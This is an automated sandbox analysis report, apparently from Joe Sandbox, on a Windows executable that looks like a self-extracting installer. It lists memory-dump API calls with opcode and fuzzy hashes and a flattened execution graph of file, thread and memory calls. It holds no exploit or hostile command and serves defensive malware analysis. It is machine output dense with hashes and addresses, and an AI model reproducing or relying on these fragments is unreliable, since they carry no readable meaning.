                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 3712363035-66219284
                                        • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                        • Instruction ID: 4727b597e06a80ccf73fde1317b74bfd1e446cf8a7cb79422ce9438d985acd26
                                        • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                        • Instruction Fuzzy Hash: 2FE0B6B4A00209BFEB109B64ED49F7B7BBDEB04648F414465BD50F6190D778A8158A7C
                                        APIs
                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030D4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,80000000,00000003), ref: 00405E63
                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030D4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,80000000,00000003), ref: 00405E73
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-224404859
                                        • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                        • Instruction ID: 42216084ebed45f2f1fcdcce66f7b00f69915d90115442600aae12f46dcfca4c
                                        • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                        • Instruction Fuzzy Hash: 65D05EB2401D209AC3226718DD04DAF73ACEF5134074A482AE582A61A4D7785E8186E8
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBF
                                        • CharNextA.USER32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD0
                                        • lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                        • Instruction ID: a453383ccec69260e8b6b46741f5159dab33bedf04c15e844a7af63cc501478c
                                        • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                        • Instruction Fuzzy Hash: 02F06235105418EFD7029BA5DD40D9EBBA8DF06350B2540BAE840F7350D678DE01ABA9

                                        Execution Graph

                                        Execution Coverage:16.4%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:53
                                        execution_graph 11580 40c960 11581 40c96d 11580->11581 11585 40c97e 11580->11585 11581->11585 11586 40c9a6 11581->11586 11587 40c9b0 __EH_prolog 11586->11587 11595 40cf16 11587->11595 11594 403204 free 11594->11585 11600 40cf20 __EH_prolog 11595->11600 11596 40cf50 11632 403204 free 11596->11632 11598 40c9c6 11602 40cec5 11598->11602 11600->11596 11616 40cf67 11600->11616 11633 403204 free 11600->11633 11604 40cecf __EH_prolog 11602->11604 11606 40ceff 11604->11606 11687 408ac1 11604->11687 11692 403204 free 11604->11692 11605 40c9d2 11609 40c9f3 11605->11609 11693 403204 free 11606->11693 11694 403204 free 11609->11694 11611 40c9fe 11695 403204 free 11611->11695 11613 40ca06 11696 40c85f 11613->11696 11617 40cf71 __EH_prolog 11616->11617 11634 407c33 11617->11634 11625 40cfaa 11655 403204 free 11625->11655 11627 40cfb2 11656 40cfe0 11627->11656 11632->11598 11633->11600 11635 407c43 11634->11635 11636 407c48 11634->11636 11672 418ac0 SetEvent 11635->11672 11638 407c5e 11636->11638 11676 418a70 WaitForSingleObject 11636->11676 11642 40d079 11638->11642 11640 407c57 11677 418a40 11640->11677 11646 40d083 __EH_prolog 11642->11646 11643 40d0b8 11681 403204 free 11643->11681 11645 40cf96 11648 40ce6f 11645->11648 11646->11643 11682 403204 free 11646->11682 11652 40ce79 __EH_prolog 11648->11652 11649 40ceae 11683 403204 free 11649->11683 11651 40ceb6 11654 403204 free 11651->11654 11652->11649 11684 403204 free 11652->11684 11654->11625 11655->11627 11657 40cfea __EH_prolog 11656->11657 11658 407c33 5 API calls 11657->11658 11659 40d003 11658->11659 11660 418a40 ctype 2 API calls 11659->11660 11661 40d00b 11660->11661 11662 418a40 ctype 2 API calls 11661->11662 11663 40d013 11662->11663 11664 418a40 ctype 2 API calls 11663->11664 11665 40cfbf 11664->11665 11666 40d028 11665->11666 11667 40d032 __EH_prolog 11666->11667 11685 403204 free 11667->11685 11669 40d045 11686 403204 free 11669->11686 11671 40cfd3 11671->11600 11673 418ad0 GetLastError 11672->11673 11674 418acd 11672->11674 11675 418ada 11673->11675 11674->11636 11675->11636 11676->11640 11678 418a49 FindCloseChangeNotification 11677->11678 11680 418a5e 11677->11680 11679 418a54 GetLastError 11678->11679 11678->11680 11679->11680 11680->11638 11681->11645 11682->11646 11683->11651 11684->11652 11685->11669 11686->11671 11688 418a40 ctype 2 API calls 11687->11688 11689 408acc 11688->11689 11690 418a40 ctype 2 API calls 11689->11690 11691 408ad4 11690->11691 11692->11604 11693->11605 11694->11611 11695->11613 11707 403204 free 11696->11707 11698 40c86a 11708 403204 free 11698->11708 11700 40c872 11709 403204 free 11700->11709 11702 40c87a 11710 403204 free 11702->11710 11704 40c882 11711 403204 free 11704->11711 11706 40c889 11706->11594 11707->11698 11708->11700 11709->11702 11710->11704 11711->11706 11712 413840 11713 41384a 11712->11713 11714 41384d 11712->11714 11714->11713 11715 413851 malloc 11714->11715 11715->11713 11716 411340 11717 411354 11716->11717 11719 411646 11716->11719 11717->11719 11725 410f10 11717->11725 11720 411655 11720->11719 11722 407b5c 34 API calls 11720->11722 11722->11719 11723 41136d 11723->11719 11723->11720 11730 4075fa 11723->11730 11735 407b5c 11723->11735 11727 410f29 11725->11727 11729 410f71 11725->11729 11727->11729 11742 4137b0 11727->11742 11745 413790 11727->11745 11729->11723 11731 40761e 11730->11731 11732 40763d 11731->11732 11748 40bcc7 11731->11748 11757 406749 11731->11757 11732->11723 11736 407b69 11735->11736 11737 407b93 11736->11737 11781 4054a0 SetFileTime 11736->11781 11782 40d37e 11736->11782 11788 405298 11736->11788 11791 404462 SetFileAttributesW 11736->11791 11737->11723 11743 4137c2 11742->11743 11744 4137b4 VirtualFree 11742->11744 11743->11727 11744->11743 11746 413794 11745->11746 11747 413797 VirtualAlloc 11745->11747 11746->11727 11747->11727 11762 418d80 11748->11762 11750 40bcd1 EnterCriticalSection 11751 40bcf9 11750->11751 11752 40bd0e 11751->11752 11763 406827 11751->11763 11753 40bd61 LeaveCriticalSection 11752->11753 11756 406749 2 API calls 11752->11756 11753->11732 11754 40bd3c 11754->11753 11756->11754 11776 4053ee 11757->11776 11760 406776 GetLastError 11761 406772 11760->11761 11761->11732 11762->11750 11764 406830 11763->11764 11765 406837 11763->11765 11764->11752 11769 405303 SetFilePointer 11765->11769 11767 40684f 11772 406803 11767->11772 11770 40532c GetLastError 11769->11770 11771 405336 11769->11771 11770->11771 11771->11767 11773 406807 11772->11773 11774 40680a GetLastError 11772->11774 11773->11764 11775 406814 11774->11775 11775->11764 11777 4053fb 11776->11777 11780 4053c1 ReadFile 11777->11780 11779 40540c 11779->11760 11779->11761 11780->11779 11781->11736 11785 40d38d 11782->11785 11783 40d467 11783->11736 11785->11783 11786 40d342 31 API calls 11785->11786 11792 4069de 11785->11792 11797 40d191 11785->11797 11786->11785 11789 4052a2 FindCloseChangeNotification 11788->11789 11790 4052ad 11788->11790 11789->11790 11790->11736 11791->11736 11803 405507 11792->11803 11795 406803 GetLastError 11796 406a11 11795->11796 11796->11785 11798 40d19b __EH_prolog 11797->11798 11810 405c91 SysAllocStringLen 11798->11810 11812 401f26 11798->11812 11914 405455 11798->11914 11799 40d216 11799->11785 11805 405514 11803->11805 11806 405540 11805->11806 11807 4054cd 11805->11807 11806->11795 11808 4054db 11807->11808 11809 4054de WriteFile 11807->11809 11808->11809 11809->11805 11811 405ca4 11810->11811 11811->11799 11813 401f30 __EH_prolog 11812->11813 11917 4023f0 EnterCriticalSection LeaveCriticalSection 11813->11917 11816 401f47 11845 401f4b 11816->11845 11918 40368d 11816->11918 11818 401f98 11823 405def VariantClear 11818->11823 11819 401fb0 11819->11818 11822 401fd4 11819->11822 11820 401fa2 11821 4037d2 3 API calls 11820->11821 11824 401fae 11821->11824 12028 40387d SysStringLen 11822->12028 11825 401fc4 11823->11825 11921 4037d2 11824->11921 12027 403204 free 11825->12027 11832 402022 11833 405def VariantClear 11832->11833 11834 402224 11833->11834 12077 403204 free 11834->12077 11836 401ff6 11836->11832 11837 402092 11836->11837 11838 4020b3 11836->11838 11902 402336 11836->11902 11839 405def VariantClear 11837->11839 11841 405def VariantClear 11838->11841 11840 40209a 11839->11840 11842 405def VariantClear 11840->11842 11846 4020ce 11841->11846 11843 4020a2 11842->11843 12034 403204 free 11843->12034 11845->11799 11846->11832 11932 4041f8 11846->11932 11849 40212f 12071 410da8 11849->12071 11853 402156 11855 40216b 11853->11855 12041 401e92 11853->12041 11950 403632 11855->11950 11859 402183 11861 4037d2 3 API calls 11859->11861 11860 4021aa 11865 40368d 2 API calls 11860->11865 11862 402191 11861->11862 11863 402198 11862->11863 11864 40219f 11862->11864 12051 404470 RemoveDirectoryW 11863->12051 12052 404419 CreateFileW 11864->12052 11868 4021bd 11865->11868 11953 404daf 11868->11953 11870 40219d 12069 403204 free 11870->12069 11873 402234 11894 4022e9 11873->11894 12078 4031dd malloc 11873->12078 11876 402206 12070 403204 free 11876->12070 11877 4021db 11877->11873 11881 4021df 11877->11881 11878 4037d2 3 API calls 11882 402307 11878->11882 12062 4038d0 11881->12062 12088 403204 free 11882->12088 11886 40230f 12089 403204 free 11886->12089 11891 402317 12090 403204 free 11891->12090 11894->11878 11895 40228b 11898 4038d0 3 API calls 11895->11898 11896 40231f 11897 410da8 free 11896->11897 11899 40232e 11897->11899 11900 40229c 11898->11900 11901 405def VariantClear 11899->11901 12084 403204 free 11900->12084 11901->11902 12091 403204 free 11902->12091 11904 4022b2 12085 403204 free 11904->12085 11906 4022ba 12086 403204 free 11906->12086 11908 4022c2 11909 410da8 free 11908->11909 11910 4022d1 11909->11910 11911 405def VariantClear 11910->11911 11912 4022d9 11911->11912 12087 403204 free 11912->12087 12234 40525f 11914->12234 11917->11816 11919 4031dd 2 API calls 11918->11919 11920 401f6f 11919->11920 11920->11818 11920->11819 11920->11820 11922 4037e2 11921->11922 11923 401feb 11921->11923 11922->11923 11924 4031dd 2 API calls 11922->11924 11927 405def 11923->11927 11925 4037f6 11924->11925 12092 403204 free 11925->12092 11928 405df5 11927->11928 11931 405d99 11927->11931 11928->11836 11929 405dc0 VariantClear 11929->11836 11930 405dd7 11930->11836 11931->11929 11931->11930 11933 404202 __EH_prolog 11932->11933 12093 4030d0 11933->12093 11936 40212a 11936->11849 11947 403740 11936->11947 11937 40368d 2 API calls 11943 404225 11937->11943 11938 404265 11939 40382a 3 API calls 11938->11939 11940 404276 11939->11940 11942 403089 4 API calls 11940->11942 11944 404282 11942->11944 11943->11938 12097 40382a 11943->12097 12103 403089 11943->12103 12111 403204 free 11944->12111 12125 4034e7 11947->12125 12128 4035d6 11950->12128 11954 404db9 __EH_prolog 11953->11954 11958 404f81 11954->11958 12138 4036b0 11954->12138 11957 4036b0 2 API calls 11964 404dfa 11957->11964 11959 405000 11958->11959 11960 404fb5 11958->11960 11961 40501c 11959->11961 11977 40504c 11959->11977 12019 405021 11959->12019 12171 404da0 GetFileAttributesW 11960->12171 11965 404da0 GetFileAttributesW 11961->11965 11969 404e38 11964->11969 12142 4039d8 11964->12142 11965->12019 11968 404fd0 12173 40376e 11968->12173 11970 404e7d 11969->11970 11980 404e58 11969->11980 11972 404daf 14 API calls 11970->11972 11971 404b27 FindClose 12026 4021cf 11971->12026 11973 404e85 11972->11973 11975 404f71 11973->11975 11988 404e7b 11973->11988 12169 403204 free 11975->12169 11976 404fe7 11976->11971 11978 4036b0 2 API calls 11977->11978 11977->12019 11981 40507c 11978->11981 11984 4037d2 3 API calls 11980->11984 11980->11988 12179 401ef8 11981->12179 11982 403740 2 API calls 11986 404eae 11982->11986 11983 404f79 12170 403204 free 11983->12170 11984->11988 11990 40368d 2 API calls 11986->11990 11988->11982 12013 404eba 11990->12013 11991 401ef8 4 API calls 11992 405094 11991->11992 11994 404b47 5 API calls 11992->11994 11995 4050a4 11994->11995 11997 4050a8 wcscmp 11995->11997 11998 4050c7 11995->11998 11996 404f06 12162 403204 free 11996->12162 11997->11998 12021 4050c0 11997->12021 12001 404da0 GetFileAttributesW 11998->12001 11999 404efe SetLastError 11999->11996 12004 4050d2 12001->12004 12003 404f48 12163 403204 free 12003->12163 12010 4050e4 12004->12010 12004->12021 12005 40376e 3 API calls 12008 40513b 12005->12008 12007 404f0a 12159 40399c 12007->12159 12184 403204 free 12008->12184 12009 404f50 12164 404b27 12009->12164 12183 403204 free 12010->12183 12013->11996 12013->11999 12013->12007 12018 40368d 2 API calls 12013->12018 12146 404d3d 12013->12146 12154 403210 12013->12154 12158 403204 free 12013->12158 12018->12013 12019->11976 12131 404b47 12019->12131 12020 405143 12023 404b27 FindClose 12020->12023 12021->12005 12023->12026 12024 404f62 12168 403204 free 12024->12168 12026->11873 12055 404643 12026->12055 12027->11845 12029 403892 12028->12029 12030 4038a6 12028->12030 12031 4031dd 2 API calls 12029->12031 12030->11824 12032 40389d 12031->12032 12223 403204 free 12032->12223 12034->11845 12035 4024b5 12036 4024c6 12035->12036 12040 4024d3 12035->12040 12224 403204 free 12036->12224 12038 4024cd 12225 403204 free 12038->12225 12040->11853 12042 401e9c __EH_prolog 12041->12042 12043 403740 2 API calls 12042->12043 12048 401ead 12043->12048 12044 401edf 12227 403204 free 12044->12227 12045 40399c 4 API calls 12045->12048 12047 401ee7 12047->11855 12048->12044 12048->12045 12050 401ef8 4 API calls 12048->12050 12226 40447d CreateDirectoryW 12048->12226 12050->12048 12051->11870 12053 4021a8 12052->12053 12054 40443e SetFileTime CloseHandle 12052->12054 12053->11870 12054->12053 12056 404da0 GetFileAttributesW 12055->12056 12058 40464b 12056->12058 12057 40466a DeleteFileW 12057->11877 12058->12057 12228 404462 SetFileAttributesW 12058->12228 12060 404664 12060->12057 12061 404668 12060->12061 12061->11877 12063 4038e3 12062->12063 12063->12063 12064 4031dd 2 API calls 12063->12064 12067 4021f0 12063->12067 12065 4038f9 12064->12065 12229 403204 free 12065->12229 12068 403204 free 12067->12068 12068->11870 12069->11876 12070->11849 12072 410dd1 12071->12072 12076 410db3 12071->12076 12230 403204 free 12072->12230 12074 410dd9 12074->11832 12075 403204 free ctype 12075->12076 12076->12072 12076->12075 12077->11845 12079 402244 12078->12079 12080 4031ee _CxxThrowException 12078->12080 12081 405489 12079->12081 12080->12079 12231 405472 12081->12231 12084->11904 12085->11906 12086->11908 12087->11845 12088->11886 12089->11891 12090->11896 12091->11845 12092->11923 12094 4030f9 12093->12094 12096 4030db 12093->12096 12094->11936 12094->11937 12095 403204 free ctype 12095->12096 12096->12094 12096->12095 12098 403838 12097->12098 12100 40384b 12097->12100 12099 4031dd 2 API calls 12098->12099 12101 403842 12099->12101 12100->11943 12112 403204 free 12101->12112 12104 403093 __EH_prolog 12103->12104 12105 4031dd 2 API calls 12104->12105 12107 40309e 12105->12107 12106 4030b5 12113 4088fd 12106->12113 12107->12106 12108 403740 2 API calls 12107->12108 12108->12106 12111->11936 12112->12100 12116 40b6b7 12113->12116 12117 40b6c2 12116->12117 12123 4030c1 12116->12123 12118 4031dd 2 API calls 12117->12118 12119 40b6e1 12118->12119 12120 40b6fa 12119->12120 12121 40b6eb memcpy 12119->12121 12124 403204 free 12120->12124 12121->12120 12123->11943 12124->12123 12126 4031dd 2 API calls 12125->12126 12127 402145 12126->12127 12127->11853 12127->12035 12129 4034e7 2 API calls 12128->12129 12130 40217a 12129->12130 12130->11859 12130->11860 12132 404b27 FindClose 12131->12132 12133 404b58 12132->12133 12134 404b73 12133->12134 12135 404b5c FindFirstFileW 12133->12135 12134->11976 12135->12134 12136 404b77 12135->12136 12185 404b8c 12136->12185 12139 4036c0 12138->12139 12140 4034e7 2 API calls 12139->12140 12141 4036d3 12140->12141 12141->11957 12143 4039ea 12142->12143 12189 40351f 12143->12189 12147 404d42 12146->12147 12148 404d4d 12146->12148 12202 404cfa 12147->12202 12207 404c6f 12148->12207 12151 404d4b 12152 404d62 12151->12152 12153 404d69 GetLastError 12151->12153 12152->12013 12153->12152 12157 403218 12154->12157 12155 40324d CharUpperW 12155->12157 12156 403242 12156->12013 12157->12155 12157->12156 12158->12013 12160 40351f 4 API calls 12159->12160 12161 4039ad 12160->12161 12161->11996 12162->12003 12163->12009 12165 404b31 FindClose 12164->12165 12166 404b3c 12164->12166 12165->12166 12167 403204 free 12166->12167 12167->12024 12168->12026 12169->11983 12170->11958 12172 404dac 12171->12172 12172->11968 12172->12019 12174 403780 12173->12174 12175 4037a4 12174->12175 12176 4031dd 2 API calls 12174->12176 12175->11976 12177 40379a 12176->12177 12219 403204 free 12177->12219 12180 401f03 12179->12180 12181 401f08 12179->12181 12220 40350a 12180->12220 12181->11991 12183->12019 12184->12020 12186 404bca 12185->12186 12187 40376e 3 API calls 12186->12187 12188 404bea 12187->12188 12188->12134 12190 403531 12189->12190 12191 403544 12189->12191 12193 403430 12190->12193 12191->11969 12194 403485 _CxxThrowException 12193->12194 12195 40343f 12193->12195 12195->12194 12196 403447 12195->12196 12197 4031dd 2 API calls 12196->12197 12198 403452 12197->12198 12201 403204 free 12198->12201 12200 403478 12200->12191 12201->12200 12203 404d0c SetLastError 12202->12203 12204 404d16 12202->12204 12206 404d25 12203->12206 12204->12206 12216 404ce3 12204->12216 12206->12151 12208 404b27 FindClose 12207->12208 12209 404c80 12208->12209 12210 404c97 SetLastError FindFirstStreamW 12209->12210 12211 404c8d SetLastError 12209->12211 12215 404cca 12209->12215 12212 404cba GetLastError 12210->12212 12213 404cc5 12210->12213 12211->12215 12212->12213 12212->12215 12214 404ce3 3 API calls 12213->12214 12213->12215 12214->12215 12215->12151 12217 40376e 3 API calls 12216->12217 12218 404cf9 12217->12218 12218->12206 12219->12175 12221 403430 4 API calls 12220->12221 12222 40351e 12221->12222 12222->12181 12223->12030 12224->12038 12225->12040 12226->12048 12227->12047 12228->12060 12229->12067 12230->12074 12232 405455 2 API calls 12231->12232 12233 402287 12232->12233 12233->11894 12233->11895 12235 405298 ctype FindCloseChangeNotification 12234->12235 12236 40526a 12235->12236 12237 405293 12236->12237 12238 40526e CreateFileW 12236->12238 12237->11799 12238->12237 12239 412b40 12242 412b5a __aulldiv 12239->12242 12240 412b70 12242->12240 12244 414cb0 12242->12244 12243 412cbb 12245 414cca 12244->12245 12247 414cd9 12244->12247 12245->12243 12249 414de8 12247->12249 12251 417c90 12247->12251 12250 414e12 12249->12250 12261 415450 12249->12261 12250->12243 12252 417cf6 12251->12252 12253 418ac0 2 API calls 12252->12253 12255 417d9d 12252->12255 12254 417d73 12253->12254 12254->12255 12256 418ac0 2 API calls 12254->12256 12255->12249 12257 417d81 12256->12257 12257->12255 12265 417e30 12257->12265 12263 415463 12261->12263 12264 415726 12263->12264 12333 414710 12263->12333 12264->12250 12266 417e47 12265->12266 12273 417e60 12266->12273 12269 417e10 12270 417e1d 12269->12270 12272 417e2a 12270->12272 12320 417c50 12270->12320 12272->12255 12282 417ec0 12273->12282 12276 418ac0 2 API calls 12277 417e91 12276->12277 12278 418ac0 2 API calls 12277->12278 12279 417e9c 12278->12279 12294 417950 EnterCriticalSection 12279->12294 12281 417d8d 12281->12255 12281->12269 12297 418a70 WaitForSingleObject 12282->12297 12284 417e6d 12284->12276 12284->12281 12285 4188f0 EnterCriticalSection LeaveCriticalSection 12291 417ef1 12285->12291 12286 418a70 WaitForSingleObject 12286->12291 12291->12284 12291->12285 12291->12286 12292 418ac0 SetEvent GetLastError 12291->12292 12293 4189e0 EnterCriticalSection LeaveCriticalSection 12291->12293 12298 418840 12291->12298 12302 418890 EnterCriticalSection 12291->12302 12305 418800 12291->12305 12309 4178d0 EnterCriticalSection 12291->12309 12292->12291 12293->12291 12295 417968 12294->12295 12296 41796b LeaveCriticalSection 12294->12296 12295->12296 12296->12281 12297->12291 12299 418882 12298->12299 12300 418858 12298->12300 12299->12291 12300->12299 12312 406516 12300->12312 12303 4188ae LeaveCriticalSection 12302->12303 12303->12291 12306 418808 12305->12306 12307 418816 12306->12307 12316 418a80 _beginthreadex 12306->12316 12307->12291 12310 417915 12309->12310 12311 417938 LeaveCriticalSection 12309->12311 12310->12311 12311->12291 12313 40652f 12312->12313 12315 4075fa 7 API calls 12313->12315 12314 406543 12314->12300 12315->12314 12317 418aa4 12316->12317 12318 418aa9 GetLastError 12316->12318 12317->12307 12319 418ab3 12318->12319 12319->12307 12321 417c7c 12320->12321 12322 417c5e 12320->12322 12324 418a40 ctype 2 API calls 12321->12324 12323 418ac0 2 API calls 12322->12323 12325 417c66 12323->12325 12326 417c84 12324->12326 12327 418ac0 2 API calls 12325->12327 12328 417c6e 12327->12328 12332 418a70 WaitForSingleObject 12328->12332 12330 417c75 12331 418a40 ctype 2 API calls 12330->12331 12331->12321 12332->12330 12334 41490e 12333->12334 12335 414744 12333->12335 12334->12263 12335->12334 12337 414812 memcpy 12335->12337 12338 4172c0 12335->12338 12337->12335 12339 4172f5 12338->12339 12340 4173db 12339->12340 12341 4175a5 memcpy 12339->12341 12340->12335 12341->12335 12342 4135e0 12343 4135f5 12342->12343 12344 4135ec 12342->12344 12347 413330 12343->12347 12349 413344 12347->12349 12351 413557 12347->12351 12348 4172c0 memcpy 12348->12349 12349->12348 12350 407b5c 34 API calls 12349->12350 12349->12351 12352 4075fa 7 API calls 12349->12352 12350->12349 12352->12349 12353 413803 VirtualAlloc 12354 413823 VirtualFree 12355 402e27 12360 402e43 12355->12360 12357 402e2f 12358 402e3c 12357->12358 12376 403204 free 12357->12376 12361 402e4d __EH_prolog 12360->12361 12377 402ed7 12361->12377 12363 402e70 12381 403204 free 12363->12381 12365 402e7b 12382 402d87 DeleteCriticalSection 12365->12382 12369 402e8c 12388 403204 free 12369->12388 12371 402ea6 12389 403204 free 12371->12389 12373 402eae 12390 403204 free 12373->12390 12375 402eb6 12375->12357 12376->12358 12378 402ee0 12377->12378 12379 402ee4 DestroyWindow 12377->12379 12378->12363 12380 402ef4 12379->12380 12380->12363 12381->12365 12383 418a40 ctype 2 API calls 12382->12383 12384 402d9c 12383->12384 12391 403204 free 12384->12391 12386 402da4 12387 403204 free 12386->12387 12387->12369 12388->12371 12389->12373 12390->12375 12391->12386 12392 41910c __set_app_type __p__fmode __p__commode 12393 41917b 12392->12393 12394 419183 __setusermatherr 12393->12394 12395 41918f 12393->12395 12394->12395 12404 419282 _controlfp 12395->12404 12397 419194 _initterm __getmainargs _initterm 12398 4191e8 GetStartupInfoA 12397->12398 12400 41921c GetModuleHandleA 12398->12400 12405 401014 12400->12405 12404->12397 12704 401951 GetVersionExW 12405->12704 12408 401031 12837 40b77a MessageBoxW 12408->12837 12409 401042 12706 4143e0 GetVersionExW 12409->12706 12413 40368d 2 API calls 12414 401052 12413->12414 12415 40368d 2 API calls 12414->12415 12416 40105a 12415->12416 12417 40368d 2 API calls 12416->12417 12418 401062 12417->12418 12419 40368d 2 API calls 12418->12419 12420 40106a GetCommandLineW 12419->12420 12421 4036b0 2 API calls 12420->12421 12422 401079 12421->12422 12716 403000 12422->12716 12426 401093 12427 40368d 2 API calls 12426->12427 12428 40109f 12427->12428 12723 4042c1 GetModuleFileNameW 12428->12723 12430 4010aa 12727 403ab3 12430->12727 12432 4010ba 12433 4010f3 12432->12433 12434 40376e 3 API calls 12432->12434 12731 4033ad 12433->12731 12436 4010e3 12434->12436 12442 403ab3 memmove 12436->12442 12440 401137 12748 4036f3 12440->12748 12441 40111e 12443 40112f 12441->12443 12838 40b77a MessageBoxW 12441->12838 12442->12433 13020 403204 free 12443->13020 12447 40368d 2 API calls 12456 40114f 12447->12456 12449 401890 13021 403204 free 12449->13021 12450 401337 12452 40368d 2 API calls 12450->12452 12455 401342 12452->12455 12453 40189b 13022 403204 free 12453->13022 12752 404a40 12455->12752 12456->12450 12839 403c57 12456->12839 12457 4018a3 13023 403204 free 12457->13023 12463 4018ab 13024 403204 free 12463->13024 12464 401354 12472 401365 12464->12472 12903 40b77a MessageBoxW 12464->12903 12465 40136d 12469 4031dd 2 API calls 12465->12469 12466 401182 12468 401193 12466->12468 12872 40b77a MessageBoxW 12466->12872 12467 40119b 12873 403f77 12467->12873 12883 401c64 12468->12883 12485 401374 12469->12485 12477 404ace 21 API calls 12472->12477 12475 4018b3 13025 403204 free 12475->13025 12481 401867 12477->12481 12479 403f77 2 API calls 12482 4011bb 12479->12482 13017 403204 free 12481->13017 12486 403f77 2 API calls 12482->12486 12768 40930e 12485->12768 12506 4011ce 12486->12506 12488 40125e 12890 403204 free 12488->12890 12489 40186f 13018 403204 free 12489->13018 12494 401269 12891 403204 free 12494->12891 12495 401877 13019 403204 free 12495->13019 12496 40139b 12904 40b77a MessageBoxW 12496->12904 12497 4013ac 12500 403740 2 API calls 12497->12500 12503 4013b8 12500->12503 12502 401274 12892 403204 free 12502->12892 12505 40368d 2 API calls 12503->12505 12509 4013c3 12505->12509 12507 40120e 12506->12507 12510 4037d2 3 API calls 12506->12510 12511 4012aa 12507->12511 12515 401220 MessageBoxW 12507->12515 12508 40127f 12893 403204 free 12508->12893 12780 4024db 12509->12780 12510->12507 12514 403f77 2 API calls 12511->12514 12518 4012ba 12514->12518 12515->12511 12519 401230 12515->12519 12516 401287 12894 403204 free 12516->12894 12523 4037d2 3 API calls 12518->12523 12880 403204 free 12519->12880 12521 401462 12817 403204 free 12521->12817 12522 4013e6 12527 40144b 12522->12527 12537 401400 12522->12537 12905 405fad 12522->12905 